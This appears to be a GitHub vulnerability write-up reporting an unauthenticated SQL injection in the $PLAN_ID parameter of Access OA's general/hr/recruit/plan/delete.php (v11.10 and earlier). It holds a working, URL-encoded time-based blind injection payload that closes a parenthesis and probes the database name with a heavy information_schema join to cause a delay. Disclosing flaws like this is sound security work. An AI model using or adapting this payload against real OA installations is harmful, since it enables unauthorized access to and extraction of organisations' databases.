Skip to content

Latest commit

 

History

History
19 lines (12 loc) · 809 Bytes

sql1.md

File metadata and controls

19 lines (12 loc) · 809 Bytes

Unauthorized SQL injection vulnerability exists in Access OA

version:v11.10 or earlier

Routing: general/hr/recruit/plan/delete. PHP

The injected parameter $PLAN_ID exists

Here the code is very concise, when the $PLAN_ID is not empty, the parameter is concatenated directly into the SQL statement, and there is a bypass because of the parenthesis closure.

image

poc

1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1

The page has obvious delay, indicating that SQL injection vulnerability exists WPS图片(1)